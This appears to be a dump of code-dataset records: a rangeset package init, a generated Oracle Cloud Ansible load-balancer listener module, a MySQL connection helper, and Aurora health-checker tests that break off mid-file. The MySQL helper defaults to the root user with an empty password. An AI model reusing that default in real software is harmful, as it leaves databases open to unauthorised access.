2017-03-23T11:36:22.000Z
|
2018-04-02T06:19:09.000Z
|
rangeset/__init__.py
|
drmingdrmer/pykit
|
e25a71146e81aaf79625cf8d4f4c439ccd515b82
|
[
"MIT"
] | 5
|
2016-12-27T07:30:47.000Z
|
2018-03-10T07:06:21.000Z
|
# Re-export the rangeset implementation's public names at package level so
# callers can write `from rangeset import RangeSet` etc.
from .rangeset import (
    IntIncRange,
    IntIncRangeSet,
    Range,
    RangeDict,
    RangeSet,
    ValueRange,
    substract_range,
    intersect,
    substract,
    union,
)
# Explicit public API of this package; mirrors the import list above.
__all__ = [
    "IntIncRange",
    "IntIncRangeSet",
    "Range",
    "RangeDict",
    "RangeSet",
    "ValueRange",
    "substract_range",
    "intersect",
    "substract",
    "union",
]
| 12.5
| 23
| 0.573333
| 26
| 375
| 8.038462
| 0.461538
| 0.239234
| 0.287081
| 0.373206
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0.899522
| 0
| 0
| 0.304
| 375
| 29
| 24
| 12.931034
| 0.800766
| 0
| 0
| 0
| 0
| 0
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041667
| 0
| 0.041667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
22daf5611f99cde53f41826e5d312b39a61f6f28
| 30,818
|
py
|
Python
|
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_loadbalancer_listener.py
|
sagar2938/oci-ansible-collection
|
5b8ce583a0d5d0aabf14494d61aea4649e18d1e6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_loadbalancer_listener
short_description: Manage a Listener resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a Listener resource in Oracle Cloud Infrastructure
- For I(state=present), adds a listener to a load balancer.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
default_backend_set_name:
description:
- The name of the associated backend set.
- "Example: `example_backend_set`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: str
port:
description:
- The communication port for the listener.
- "Example: `80`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: int
protocol:
description:
- The protocol on which the listener accepts connection requests.
To get a list of valid protocols, use the L(ListProtocols,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/LoadBalancerProtocol/ListProtocols)
operation.
- "Example: `HTTP`"
- Required for create using I(state=present), update using I(state=present) with name present.
type: str
hostname_names:
description:
- An array of hostname resource names.
- This parameter is updatable.
type: list
elements: str
path_route_set_name:
description:
- Deprecated. Please use `routingPolicies` instead.
- The name of the set of path-based routing rules, L(PathRouteSet,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/PathRouteSet/),
applied to this listener's traffic.
- "Example: `example_path_route_set`"
- This parameter is updatable.
type: str
ssl_configuration:
description:
- ""
- This parameter is updatable.
type: dict
suboptions:
verify_depth:
description:
- The maximum depth for peer certificate chain verification.
- "Example: `3`"
type: int
verify_peer_certificate:
description:
- Whether the load balancer listener should verify peer certificates.
- "Example: `true`"
type: bool
trusted_certificate_authority_ids:
description:
- Ids for OCI certificates service CA or CA bundles for the load balancer to trust.
- "Example: `[ocid1.cabundle.oc1.us-ashburn-1.amaaaaaaav3bgsaagl4zzyqdop5i2vuwoqewdvauuw34llqa74otq2jdsfyq]`"
type: list
elements: str
certificate_ids:
description:
- Ids for OCI certificates service certificates. Currently only a single Id may be passed.
- "Example: `[ocid1.certificate.oc1.us-ashburn-1.amaaaaaaav3bgsaa5o2q7rh5nfmkkukfkogasqhk6af2opufhjlqg7m6jqzq]`"
type: list
elements: str
certificate_name:
description:
- A friendly name for the certificate bundle. It must be unique and it cannot be changed.
Valid certificate bundle names include only alphanumeric characters, dashes, and underscores.
Certificate bundle names cannot contain spaces. Avoid entering confidential information.
- "Example: `example_certificate_bundle`"
type: str
protocols:
description:
- A list of SSL protocols the load balancer must support for HTTPS or SSL connections.
- The load balancer uses SSL protocols to establish a secure connection between a client and a server. A secure
connection ensures that all data passed between the client and the server is private.
- "The Load Balancing service supports the following protocols:"
- "* TLSv1
* TLSv1.1
* TLSv1.2"
- If this field is not specified, TLSv1.2 is the default.
- "**Warning:** All SSL listeners created on a given port must use the same set of SSL protocols."
- "**Notes:**"
- "* The handshake to establish an SSL connection fails if the client supports none of the specified protocols.
* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite.
* For all existing load balancer listeners and backend sets that predate this feature, the `GET` operation
displays a list of SSL protocols currently used by those resources."
          - "Example: `[\\"TLSv1.1\\", \\"TLSv1.2\\"]`"
type: list
elements: str
cipher_suite_name:
description:
- The name of the cipher suite to use for HTTPS or SSL connections.
- If this field is not specified, the default is `oci-default-ssl-cipher-suite-v1`.
- "**Notes:**"
- "* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite. Clients cannot perform an SSL handshake if there is an incompatible configuration.
* You must ensure compatibility between the ciphers configured in the cipher suite and the configured
certificates. For example, RSA-based ciphers require RSA certificates and ECDSA-based ciphers require ECDSA
certificates.
* If the cipher configuration is not modified after load balancer creation, the `GET` operation returns
`oci-default-ssl-cipher-suite-v1` as the value of this field in the SSL configuration for existing listeners
that predate this feature.
* If the cipher configuration was modified using Oracle operations after load balancer creation, the `GET`
operation returns `oci-customized-ssl-cipher-suite` as the value of this field in the SSL configuration for
existing listeners that predate this feature.
* The `GET` operation returns `oci-wider-compatible-ssl-cipher-suite-v1` as the value of this field in the SSL
configuration for existing backend sets that predate this feature.
* If the `GET` operation on a listener returns `oci-customized-ssl-cipher-suite` as the value of this field,
you must specify an appropriate predefined or custom cipher suite name when updating the resource.
* The `oci-customized-ssl-cipher-suite` Oracle reserved cipher suite name is not accepted as valid input for
this field."
          - "Example: `example_cipher_suite`"
type: str
server_order_preference:
description:
- When this attribute is set to ENABLED, the system gives preference to the server ciphers over the client
ciphers.
- "**Note:** This configuration is applicable only when the load balancer is acting as an SSL/HTTPS server. This
field is ignored when the `SSLConfiguration` object is associated with a backend set."
type: str
choices:
- "ENABLED"
- "DISABLED"
connection_configuration:
description:
- ""
- This parameter is updatable.
type: dict
suboptions:
idle_timeout:
description:
- The maximum idle time, in seconds, allowed between two successive receive or two successive send operations
between the client and backend servers. A send operation does not reset the timer for receive operations. A
receive operation does not reset the timer for send operations.
- For more information, see L(Connection
Configuration,https://docs.cloud.oracle.com/Content/Balance/Reference/connectionreuse.htm#ConnectionConfiguration).
- "Example: `1200`"
type: int
required: true
backend_tcp_proxy_protocol_version:
description:
- The backend TCP Proxy Protocol version.
- "Example: `1`"
type: int
name:
description:
- A friendly name for the listener. It must be unique and it cannot be changed.
Avoid entering confidential information.
- "Example: `example_listener`"
type: str
required: true
routing_policy_name:
description:
- The name of the routing policy applied to this listener's traffic.
- "Example: `example_routing_policy`"
- This parameter is updatable.
type: str
rule_set_names:
description:
- The names of the L(rule sets,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/loadbalancer/20170115/RuleSet/) to apply to the listener.
- "Example: [\\"example_rule_set\\"]"
- This parameter is updatable.
type: list
elements: str
load_balancer_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the load balancer on which to add a listener.
type: str
required: true
state:
description:
- The state of the Listener.
- Use I(state=present) to create or update a Listener.
- Use I(state=absent) to delete a Listener.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create listener
oci_loadbalancer_listener:
# required
default_backend_set_name: example_backend_set
port: 80
protocol: HTTP
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
# optional
hostname_names: [ "null" ]
path_route_set_name: example_path_route_set
ssl_configuration:
# optional
verify_depth: 3
verify_peer_certificate: true
trusted_certificate_authority_ids: [ "null" ]
certificate_ids: [ "null" ]
certificate_name: example_certificate_bundle
protocols: [ "null" ]
cipher_suite_name: cipher_suite_name_example
server_order_preference: ENABLED
connection_configuration:
# required
idle_timeout: 1200
# optional
backend_tcp_proxy_protocol_version: 1
routing_policy_name: example_routing_policy
rule_set_names: [ "null" ]
- name: Update listener
oci_loadbalancer_listener:
# required
default_backend_set_name: example_backend_set
port: 80
protocol: HTTP
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
# optional
hostname_names: [ "null" ]
path_route_set_name: example_path_route_set
ssl_configuration:
# optional
verify_depth: 3
verify_peer_certificate: true
trusted_certificate_authority_ids: [ "null" ]
certificate_ids: [ "null" ]
certificate_name: example_certificate_bundle
protocols: [ "null" ]
cipher_suite_name: cipher_suite_name_example
server_order_preference: ENABLED
connection_configuration:
# required
idle_timeout: 1200
# optional
backend_tcp_proxy_protocol_version: 1
routing_policy_name: example_routing_policy
rule_set_names: [ "null" ]
- name: Delete listener
oci_loadbalancer_listener:
# required
name: example_listener
load_balancer_id: "ocid1.loadbalancer.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
"""
RETURN = """
listener:
description:
- Details of the Listener resource acted upon by the current operation
returned: on success
type: complex
contains:
name:
description:
- A friendly name for the listener. It must be unique and it cannot be changed.
- "Example: `example_listener`"
returned: on success
type: str
sample: example_listener
default_backend_set_name:
description:
- The name of the associated backend set.
- "Example: `example_backend_set`"
returned: on success
type: str
sample: example_backend_set
port:
description:
- The communication port for the listener.
- "Example: `80`"
returned: on success
type: int
sample: 0
protocol:
description:
- The protocol on which the listener accepts connection requests.
To get a list of valid protocols, use the L(ListProtocols,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/LoadBalancerProtocol/ListProtocols)
operation.
- "Example: `HTTP`"
returned: on success
type: str
sample: HTTP
hostname_names:
description:
- An array of hostname resource names.
returned: on success
type: list
sample: []
path_route_set_name:
description:
- Deprecated. Please use `routingPolicies` instead.
- The name of the set of path-based routing rules, L(PathRouteSet,https://docs.cloud.oracle.com/en-
us/iaas/api/#/en/loadbalancer/20170115/PathRouteSet/),
applied to this listener's traffic.
- "Example: `example_path_route_set`"
returned: on success
type: str
sample: example_path_route_set
ssl_configuration:
description:
- ""
returned: on success
type: complex
contains:
verify_depth:
description:
- The maximum depth for peer certificate chain verification.
- "Example: `3`"
returned: on success
type: int
sample: 3
verify_peer_certificate:
description:
- Whether the load balancer listener should verify peer certificates.
- "Example: `true`"
returned: on success
type: bool
sample: true
trusted_certificate_authority_ids:
description:
- Ids for OCI certificates service CA or CA bundles for the load balancer to trust.
- "Example: `[ocid1.cabundle.oc1.us-ashburn-1.amaaaaaaav3bgsaagl4zzyqdop5i2vuwoqewdvauuw34llqa74otq2jdsfyq]`"
returned: on success
type: list
sample: []
certificate_ids:
description:
- Ids for OCI certificates service certificates. Currently only a single Id may be passed.
- "Example: `[ocid1.certificate.oc1.us-ashburn-1.amaaaaaaav3bgsaa5o2q7rh5nfmkkukfkogasqhk6af2opufhjlqg7m6jqzq]`"
returned: on success
type: list
sample: []
certificate_name:
description:
- A friendly name for the certificate bundle. It must be unique and it cannot be changed.
Valid certificate bundle names include only alphanumeric characters, dashes, and underscores.
Certificate bundle names cannot contain spaces. Avoid entering confidential information.
- "Example: `example_certificate_bundle`"
returned: on success
type: str
sample: example_certificate_bundle
server_order_preference:
description:
- When this attribute is set to ENABLED, the system gives preference to the server ciphers over the client
ciphers.
- "**Note:** This configuration is applicable only when the load balancer is acting as an SSL/HTTPS server. This
field is ignored when the `SSLConfiguration` object is associated with a backend set."
returned: on success
type: str
sample: ENABLED
cipher_suite_name:
description:
- The name of the cipher suite to use for HTTPS or SSL connections.
- If this field is not specified, the default is `oci-default-ssl-cipher-suite-v1`.
- "**Notes:**"
- "* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite. Clients cannot perform an SSL handshake if there is an incompatible configuration.
* You must ensure compatibility between the ciphers configured in the cipher suite and the configured
certificates. For example, RSA-based ciphers require RSA certificates and ECDSA-based ciphers require ECDSA
certificates.
* If the cipher configuration is not modified after load balancer creation, the `GET` operation returns
`oci-default-ssl-cipher-suite-v1` as the value of this field in the SSL configuration for existing listeners
that predate this feature.
* If the cipher configuration was modified using Oracle operations after load balancer creation, the `GET`
operation returns `oci-customized-ssl-cipher-suite` as the value of this field in the SSL configuration for
existing listeners that predate this feature.
* The `GET` operation returns `oci-wider-compatible-ssl-cipher-suite-v1` as the value of this field in the SSL
configuration for existing backend sets that predate this feature.
* If the `GET` operation on a listener returns `oci-customized-ssl-cipher-suite` as the value of this field,
you must specify an appropriate predefined or custom cipher suite name when updating the resource.
* The `oci-customized-ssl-cipher-suite` Oracle reserved cipher suite name is not accepted as valid input for
this field."
                  - "Example: `example_cipher_suite`"
returned: on success
type: str
sample: cipher_suite_name_example
protocols:
description:
- A list of SSL protocols the load balancer must support for HTTPS or SSL connections.
- The load balancer uses SSL protocols to establish a secure connection between a client and a server. A secure
connection ensures that all data passed between the client and the server is private.
- "The Load Balancing service supports the following protocols:"
- "* TLSv1
* TLSv1.1
* TLSv1.2"
- If this field is not specified, TLSv1.2 is the default.
- "**Warning:** All SSL listeners created on a given port must use the same set of SSL protocols."
- "**Notes:**"
- "* The handshake to establish an SSL connection fails if the client supports none of the specified protocols.
* You must ensure compatibility between the specified SSL protocols and the ciphers configured in the cipher
suite.
* For all existing load balancer listeners and backend sets that predate this feature, the `GET` operation
displays a list of SSL protocols currently used by those resources."
                  - "Example: `[\\"TLSv1.1\\", \\"TLSv1.2\\"]`"
returned: on success
type: list
sample: []
connection_configuration:
description:
- ""
returned: on success
type: complex
contains:
idle_timeout:
description:
- The maximum idle time, in seconds, allowed between two successive receive or two successive send operations
between the client and backend servers. A send operation does not reset the timer for receive operations. A
receive operation does not reset the timer for send operations.
- For more information, see L(Connection
Configuration,https://docs.cloud.oracle.com/Content/Balance/Reference/connectionreuse.htm#ConnectionConfiguration).
- "Example: `1200`"
returned: on success
type: int
sample: 1200
backend_tcp_proxy_protocol_version:
description:
- The backend TCP Proxy Protocol version.
- "Example: `1`"
returned: on success
type: int
sample: 1
rule_set_names:
description:
- The names of the L(rule sets,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/loadbalancer/20170115/RuleSet/) to apply to the listener.
- "Example: [\\"example_rule_set\\"]"
returned: on success
type: list
sample: []
routing_policy_name:
description:
- The name of the routing policy applied to this listener's traffic.
- "Example: `example_routing_policy_name`"
returned: on success
type: str
sample: example_routing_policy_name
sample: {
"name": "example_listener",
"default_backend_set_name": "example_backend_set",
"port": 0,
"protocol": "HTTP",
"hostname_names": [],
"path_route_set_name": "example_path_route_set",
"ssl_configuration": {
"verify_depth": 3,
"verify_peer_certificate": true,
"trusted_certificate_authority_ids": [],
"certificate_ids": [],
"certificate_name": "example_certificate_bundle",
"server_order_preference": "ENABLED",
"cipher_suite_name": "cipher_suite_name_example",
"protocols": []
},
"connection_configuration": {
"idle_timeout": 1200,
"backend_tcp_proxy_protocol_version": 1
},
"rule_set_names": [],
"routing_policy_name": "example_routing_policy_name"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.load_balancer import LoadBalancerClient
from oci.load_balancer.models import CreateListenerDetails
from oci.load_balancer.models import UpdateListenerDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class ListenerHelperGen(OCIResourceHelperBase):
    """Supported operations: create, update and delete"""

    def get_module_resource_id_param(self):
        # Listeners are addressed by name rather than by an OCID.
        return "name"

    def get_module_resource_id(self):
        return self.module.params.get("name")

    def get_create_model_class(self):
        return CreateListenerDetails

    def is_update(self):
        # Update applies only when state=present AND the listener already exists.
        return (
            self.module.params.get("state") == "present"
            and self.does_resource_exist()
        )

    def is_create(self):
        # Create applies only when state=present AND the listener does not exist yet.
        return (
            self.module.params.get("state") == "present"
            and not self.does_resource_exist()
        )

    def _work_request_wait_kwargs(self, operation_key):
        # Waiter wiring shared by create/update/delete: every mutation on a
        # load balancer is tracked through a work request until completion.
        return dict(
            waiter_type=oci_wait_utils.WORK_REQUEST_WAITER_KEY,
            operation=operation_key,
            waiter_client=self.get_waiter_client(),
            resource_helper=self,
            wait_for_states=oci_common_utils.get_work_request_completed_states(),
        )

    def create_resource(self):
        """Create the listener and wait for the work request to finish."""
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.create_listener,
            call_fn_args=(),
            call_fn_kwargs=dict(
                create_listener_details=self.get_create_model(),
                load_balancer_id=self.module.params.get("load_balancer_id"),
            ),
            **self._work_request_wait_kwargs(oci_common_utils.CREATE_OPERATION_KEY)
        )

    def get_update_model_class(self):
        return UpdateListenerDetails

    def update_resource(self):
        """Update the listener and wait for the work request to finish."""
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.update_listener,
            call_fn_args=(),
            call_fn_kwargs=dict(
                update_listener_details=self.get_update_model(),
                load_balancer_id=self.module.params.get("load_balancer_id"),
                listener_name=self.module.params.get("name"),
            ),
            **self._work_request_wait_kwargs(oci_common_utils.UPDATE_OPERATION_KEY)
        )

    def delete_resource(self):
        """Delete the listener and wait for the work request to finish."""
        return oci_wait_utils.call_and_wait(
            call_fn=self.client.delete_listener,
            call_fn_args=(),
            call_fn_kwargs=dict(
                load_balancer_id=self.module.params.get("load_balancer_id"),
                listener_name=self.module.params.get("name"),
            ),
            **self._work_request_wait_kwargs(oci_common_utils.DELETE_OPERATION_KEY)
        )
# Pick up any hand-written customization class registered under this name;
# falls back to a no-op base when the project defines none.
ListenerHelperCustom = get_custom_class("ListenerHelperCustom")


class ResourceHelper(ListenerHelperCustom, ListenerHelperGen):
    # MRO: customizations (if any) override the generated implementation.
    pass
def main():
    """Ansible entry point: build the argument spec, then dispatch the
    requested delete/update/create on the Listener resource."""
    # Nested option specs, hoisted out for readability.
    ssl_configuration_spec = dict(
        verify_depth=dict(type="int"),
        verify_peer_certificate=dict(type="bool"),
        trusted_certificate_authority_ids=dict(type="list", elements="str"),
        certificate_ids=dict(type="list", elements="str"),
        certificate_name=dict(type="str"),
        protocols=dict(type="list", elements="str"),
        cipher_suite_name=dict(type="str"),
        server_order_preference=dict(type="str", choices=["ENABLED", "DISABLED"]),
    )
    connection_configuration_spec = dict(
        idle_timeout=dict(type="int", required=True),
        backend_tcp_proxy_protocol_version=dict(type="int"),
    )

    module_args = oci_common_utils.get_common_arg_spec(
        supports_create=True, supports_wait=True
    )
    module_args.update(
        default_backend_set_name=dict(type="str"),
        port=dict(type="int"),
        protocol=dict(type="str"),
        hostname_names=dict(type="list", elements="str"),
        path_route_set_name=dict(type="str"),
        ssl_configuration=dict(type="dict", options=ssl_configuration_spec),
        connection_configuration=dict(
            type="dict", options=connection_configuration_spec
        ),
        name=dict(type="str", required=True),
        routing_policy_name=dict(type="str"),
        rule_set_names=dict(type="list", elements="str"),
        load_balancer_id=dict(type="str", required=True),
        state=dict(type="str", default="present", choices=["present", "absent"]),
    )

    module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)

    if not HAS_OCI_PY_SDK:
        module.fail_json(msg="oci python sdk required for this module.")

    resource_helper = ResourceHelper(
        module=module,
        resource_type="listener",
        service_client_class=LoadBalancerClient,
        namespace="load_balancer",
    )

    # Exactly one branch runs; check-mode and idempotence are handled inside
    # the helper, and a no-op leaves changed=False.
    result = dict(changed=False)
    if resource_helper.is_delete():
        result = resource_helper.delete()
    elif resource_helper.is_update():
        result = resource_helper.update()
    elif resource_helper.is_create():
        result = resource_helper.create()

    module.exit_json(**result)


if __name__ == "__main__":
    main()
| 45.860119
| 154
| 0.590564
| 3,232
| 30,818
| 5.473082
| 0.122834
| 0.022387
| 0.020182
| 0.024931
| 0.841992
| 0.814518
| 0.766409
| 0.731472
| 0.698287
| 0.680875
| 0
| 0.009828
| 0.342949
| 30,818
| 671
| 155
| 45.928465
| 0.863746
| 0.013953
| 0
| 0.717286
| 0
| 0.050081
| 0.808731
| 0.099388
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016155
| false
| 0.008078
| 0.012924
| 0.008078
| 0.050081
| 0.001616
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3adc8aef5ddcc4f82d6dc688a380de5c6b6373e
| 163
|
py
|
Python
|
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | 4
|
2019-02-17T22:01:12.000Z
|
2021-01-13T06:59:41.000Z
|
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | null | null | null |
system/config.py
|
sfsm565826960/Novel2Love
|
ce7e8d12fedc48573f4b783cc261160b907a2c62
|
[
"MIT"
] | null | null | null |
#coding=utf-8
def connect_db(user='root', password='', database='novel2love'):
    """Open and return a MySQL connection.

    The previously hard-coded credentials are kept as the defaults so existing
    callers (``connect_db()``) behave exactly as before, but they can now be
    overridden per call.

    :param user: MySQL user name.
    :param password: MySQL password.  NOTE(review): the default is an empty
        root password — acceptable only for local development; supply real
        credentials (e.g. from configuration) before deploying.
    :param database: schema name to connect to.
    :return: an open ``mysql.connector`` connection object.
    """
    # Imported lazily so merely importing this module does not require the
    # mysql-connector package to be installed.
    import mysql.connector
    return mysql.connector.connect(
        user=user, password=password, database=database, use_unicode=True
    )
| 23.285714
| 101
| 0.730061
| 21
| 163
| 5.571429
| 0.857143
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013986
| 0.122699
| 163
| 6
| 102
| 27.166667
| 0.804196
| 0.07362
| 0
| 0
| 0
| 0
| 0.093333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
a3b5a22a805753d42e97f8f1e4e3dab7d3c9c507
| 55,338
|
py
|
Python
|
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/apache/aurora/executor/common/test_health_checker.py
|
ajain13/aurora
|
40d91feb71b85c1ad31233a45b6d70603de224fc
|
[
"Apache-2.0"
] | 1
|
2022-02-27T10:41:45.000Z
|
2022-02-27T10:41:45.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os.path
import threading
import time
import unittest
import mock
import pytest
from mesos.interface.mesos_pb2 import TaskState
from twitter.common.exceptions import ExceptionalThread
from twitter.common.testing.clock import ThreadedClock
from apache.aurora.common.health_check.http_signaler import HttpSignaler
from apache.aurora.config.schema.base import (
HealthCheckConfig,
HealthCheckerConfig,
HttpHealthChecker,
ShellHealthChecker
)
from apache.aurora.executor.common.health_checker import (
HealthChecker,
HealthCheckerProvider,
NoopHealthChecker
)
from apache.aurora.executor.common.sandbox import SandboxInterface
from apache.aurora.executor.common.status_checker import StatusResult
from .fixtures import HELLO_WORLD, MESOS_JOB
from gen.apache.aurora.api.ttypes import AssignedTask, ExecutorConfig, JobKey, TaskConfig
class TestHealthChecker(unittest.TestCase):
def setUp(self):
self._clock = ThreadedClock(0)
self._checker = mock.Mock(spec=HttpSignaler)
self.initial_interval_secs = 15
self.interval_secs = 10
self.fake_health_checks = []
def mock_health_check():
return self.fake_health_checks.pop(0)
self._checker.health = mock.Mock(spec=self._checker.__call__)
self._checker.health.side_effect = mock_health_check
def append_health_checks(self, status, num_calls=1):
for i in range(num_calls):
self.fake_health_checks.append((status, 'reason'))
def test_grace_period_2x_success(self):
'''Grace period is 2 x interval and health checks succeed.'''
self.append_health_checks(True, num_calls=2)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 1
def test_grace_period_2x_failure_then_success(self):
'''Grace period is 2 x interval and health checks fail then succeed.'''
self.append_health_checks(False)
self.append_health_checks(True)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
hct.stop()
assert self._checker.health.call_count == 2
def test_ignore_failures_after_running_inside_grace_period(self):
'''Grace period is 2 x interval and health checks succeed then fail.'''
self.append_health_checks(True)
self.append_health_checks(False)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
hct.stop()
assert self._checker.health.call_count == 2
def test_does_not_ignores_failures_after_running_outside_grace_period(self):
'''Grace period is 2 x interval and health checks succeed then fail.'''
self.append_health_checks(True)
self.append_health_checks(False, num_calls=2)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 0
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.threaded_health_checker.running is True
assert hct.threaded_health_checker.current_consecutive_failures == 1
hct.stop()
assert self._checker.health.call_count == 3
def test_grace_period_2x_failure(self):
'''
Grace period is 2 x interval and all health checks fail.
Failures are ignored when in grace period.
'''
self.append_health_checks(False, num_calls=3)
hct = HealthChecker(
self._checker.health,
interval_secs=self.interval_secs,
clock=self._clock)
hct.start()
assert self._clock.converge(threads=[hct.threaded_health_checker])
